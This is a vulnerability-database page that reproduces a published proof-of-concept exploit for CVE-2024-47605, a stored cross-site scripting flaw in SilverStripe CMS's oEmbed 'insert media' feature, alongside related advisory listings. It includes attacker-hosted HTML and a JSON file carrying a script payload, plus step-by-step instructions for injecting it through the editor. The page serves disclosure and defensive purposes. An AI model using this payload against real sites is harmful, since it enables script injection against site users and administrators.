Vulners
Lucene search
📄 SilverStripe 5.3.8 Cross Site Scripting
| Reporter | Title | Published | Views | Family All 15 |
|---|---|---|---|---|
 | CVE-2024-47605 | 14 Jan 202523:09 | – | circl |
 | Silverstripe Asset Admin Module 跨站脚本漏洞 | 14 Jan 202500:00 | – | cnnvd |
 | CVE-2024-47605 | 14 Jan 202522:42 | – | cve |
 | CVE-2024-47605 Cross-site Scripting via insert media remote file oembed in silverstripe-asset-admin | 14 Jan 202522:42 | – | cvelist |
 | SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated) | 14 Apr 202500:00 | – | exploitdb |
 | EUVD-2025-0081 | 3 Oct 202520:07 | – | euvd |
 | CVE-2024-47605 - XSS via insert media remote file oembed | 14 Jan 202521:24 | – | friendsofphp |
 | Silverstripe Framework has a XSS via insert media remote file oembed | 14 Jan 202522:18 | – | github |
 | CVE-2024-47605 | 14 Jan 202523:15 | – | nvd |
 | CVE-2024-47605 Cross-site Scripting via insert media remote file oembed in silverstripe-asset-admin | 14 Jan 202522:42 | – | osv |
10
# Exploit Title: SilverStripe 5.3.8 - Stored Cross Site Scripting (XSS) (Authenticated)
# Date: 2025-01-15
# Exploit Author: James Nicoll
# Vendor Homepage: https://www.silverstripe.org/
# Software Link: https://www.silverstripe.org/download/
# Category: Web Application
# Version: 5.2.22
# Tested on: SilverStripe 5.2.22 - Ubuntu 24.04
# CVE : CVE-2024-47605
## Explanation:
When using the "insert media" functionality, the linked oEmbed JSON includes an HTML attribute which will replace the embed shortcode. The HTML is not sanitized before replacing the shortcode, allowing a script payload to be executed on both the CMS and the front-end of the website.
## Requirements
1. A Silverstripe CMS website.
2. Valid login credentials for a user with page edit rights.
3. An attacker server hosting malicious payload.
## On the attacker server:
1. Create an html file with oembded information:
```
<html>
<head>
<link rel="alternate" type="application/json+oembed" href="http://<attacker_server_ip>/oembed.json" title="Payload" />
</head>
<body>
<img src="media.jpg">
</body>
</html>
```
2. Create the json file with XSS payload:
```
{
"title": "Title",
"author_name": "author",
"type": "video",
"height": 113,
"width": 200,
"version": "1.0",
"provider_name": "FakeSite",
"thumbnail_height": 360,
"thumbnail_width": 480,
"thumbnail_url": "http://<attacker_server_ip>/media.jpg",
"html":"<script>alert('hello world');</script>"
}
```
3. The media.jpg file can be any image.
4. Host these files on a publicly available website
## On the SilverStripe website:
1. Log into the admin portal with a user account that has page editor rights (or higher).
2. Select the page you wish to load the malicious content into.
3. Within the editor panel, select the "Insert Media via URL" button.
4. Enter the IP/Hostname of the attacker server.
5. Click Add Media, Insert Media, and then save and publish the page.Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Apr 2025 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.15.4
EPSS0.05366
SSVC